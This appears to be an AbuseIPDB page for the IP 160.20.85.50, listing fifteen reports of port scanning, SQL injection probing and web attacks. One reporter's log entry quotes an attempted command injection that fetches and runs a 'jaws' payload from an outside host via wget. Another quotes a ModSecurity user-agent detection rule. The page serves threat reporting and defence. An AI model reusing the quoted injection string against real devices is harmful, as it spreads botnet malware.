JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 160.20.85.50

160.20.85.50 was found in our database!

This IP was reported 15 times. Confidence of Abuse is 50%: ?

50%

ISP	G2G COM PROD ELETRO E SERV LTDA
Usage Type	Fixed Line ISP
ASN	AS52571
Domain Name	g2gtelecom.com.br
Country	🇧🇷 Brazil
City	Mairinque, Sao Paulo

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 160.20.85.50

Whois 160.20.85.50

IP Abuse Reports for 160.20.85.50:

This IP address has been reported a total of 15 times from 12 distinct sources. 160.20.85.50 was first reported on July 27th 2025, and the most recent report was 4 days ago.

Recent Reports: We have received reports of abusive activity from this IP address within the last week. It is potentially still actively engaged in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇷🇸 Smel	2026-06-17 10:23:12 (4 days ago)	SQL/MH Probe, Scan, Hack -	Port Scan Hacking SQL Injection
🇺🇸 Axel	2026-06-15 17:30:41 (6 days ago)	Blocked by UFW on MVI [443/tcp] \| SPT: 22227 \| TTL: 53 \| LEN: 44 \| TOS: 0x00 • Reported by: github.c ... show more Blocked by UFW on MVI [443/tcp] \| SPT: 22227 \| TTL: 53 \| LEN: 44 \| TOS: 0x00 • Reported by: github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇧🇾 stroytrest	2026-06-05 14:14:23 (2 weeks ago)	2026-06-05T17:14:22.093632+03:00 gate kernel: [983461.260476] nftables: JAIL-MSS IN=wan OUT=enp2s0 M ... show more 2026-06-05T17:14:22.093632+03:00 gate kernel: [983461.260476] nftables: JAIL-MSS IN=wan OUT=enp2s0 MAC= SRC=160.20.85.50 DST=xxx.xxx.xxx.xxx LEN=44 TOS=0x00 PREC=0x00 TTL=48 ID=40191 PROTO=TCP SPT=22454 DPT=443 WINDOW=12398 RES=0x00 SYN URGP=0 ... show less	Port Scan
🇺🇸 MPL	2026-06-04 18:55:36 (2 weeks ago)	tcp/80	Port Scan
🇺🇸 MPL	2026-06-04 17:37:13 (2 weeks ago)	tcp/12345 (2 or more attempts)	Port Scan
🇮🇪 RoboSOC	2026-06-04 07:29:30 (2 weeks ago)	MVPower DVR Shell Unauthenticated Command Execution Vulnerability, PTR: PTR record not found	Hacking
Anonymous	2026-06-04 05:27:25 (2 weeks ago)	Unauthorized connection attempt	Port Scan Hacking Exploited Host
🇸🇪 NordhTech	2026-06-04 03:15:23 (2 weeks ago)	More than 3 malicious connection attempts, trying port(s) 5555/tcp, then blocked from services ...	Port Scan Hacking
🇫🇷 EDSL	2026-06-04 02:49:54 (2 weeks ago)	[SRV-VPN1] Blocked by SysWarden Firewall (Web Attack)	Port Scan Hacking Web App Attack
🇺🇸 MPL	2026-06-04 02:38:14 (2 weeks ago)	tcp/80 (2 or more attempts)	Port Scan
🇦🇺 LiftUp Hosting	2026-06-03 22:58:36 (2 weeks ago)	Honeypot hit: Unauthorized traffic (31 bytes of payload); 8888 [1] TCP	Port Scan
🇳🇱 ipoac.nl	2026-06-03 22:29:39 (2 weeks ago)	ipoac.nl:80 160.20.85.50 - - [04/Jun/2026:00:29:38 +0200] - "GET /shell?cd+/tmp;rm+-rf+;wget+ 140.2 ... show more ipoac.nl:80 160.20.85.50 - - [04/Jun/2026:00:29:38 +0200] - "GET /shell?cd+/tmp;rm+-rf+;wget+ 140.233.190.47/jaws;chmod+777+jaws;sh+jaws;./jaws;" 400 1522 "-" "-" show less	Bad Web Bot
🇺🇸 TPI-Abuse	2026-03-16 17:19:43 (3 months ago)	(mod_security) mod_security (id:210831) triggered by 160.20.85.50 (-): 1 in the last 300 secs; Ports ... show more (mod_security) mod_security (id:210831) triggered by 160.20.85.50 (-): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Mar 16 13:19:39.799743 2026] [security2:error] [pid 22571:tid 22571] [client 160.20.85.50:5731] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:^(?:microsoft url\|user-Agent\|www\\\\.weblogs\\\\.com\|(?:jakart\|vi)a\|(google\|i{0,1}explorer{0,1}\\\\.exe\|(ms){0,1}ie( [0-9.]{1,}){0,1} {0,1}(compatible( browser){0,1}){0,1})$)\|\\\\bdatacha0s\\\\b\|; widows\|\\\\\\\\r\|a(?: href=\|d(?:sarobot\|vanced email extractor ..." at REQUEST_HEADERS:User-Agent. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/03_Global_Agents.conf"] [line "29"] [id "210831"] [rev "2"] [msg "COMODO WAF: Rogue web site crawler\|\|www.mcacpas.com\|F\|4"] [data "Gecko/25"] [severity "WARNING"] [tag "CWAF"] [tag "Agents"] [hostname "www.mcacpas.com"] [uri "/videos.html"] [unique_id "abg7qxedR3iYTk3HTs6mxwAAAFM"] show less	Brute-Force Bad Web Bot Web App Attack
🇪🇸 Global Cyber Police	2025-07-28 09:04:04 (10 months ago)	Malicious bot activity detected: Hitting honeypot page. Part of massive botnet.	DDoS Attack Hacking SQL Injection Spoofing Brute-Force Bad Web Bot Web App Attack
🇪🇸 Global Cyber Police	2025-07-27 15:37:39 (10 months ago)	Malicious bot activity detected: Hitting honeypot page (200 OK with 258/259 bytes sent).	Port Scan Brute-Force Web App Attack

Showing 1 to 15 of 15 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇨🇳 180.102.110.161

🇩🇪 155.117.127.214

🇳🇱 89.21.67.164

🇺🇸 23.251.34.171

🇺🇸 20.64.104.142

🇩🇪 2003:ca:5f4d:47bf:dc90:6eb7:c245:2a0a

🇺🇸 216.218.206.117

🇺🇸 195.184.76.175

🇳🇱 185.132.176.56

🇲🇩 178.175.130.250

🇮🇩 163.7.9.55

🇭🇰 116.48.150.115

🇨🇳 112.86.146.178

🇸🇬 111.119.204.198

🇩🇪 69.5.169.164

🇱🇹 45.227.254.170

🇸🇪 45.84.107.17

🇺🇸 20.106.57.122

🇬🇧 194.50.235.150

🇳🇱 185.93.89.157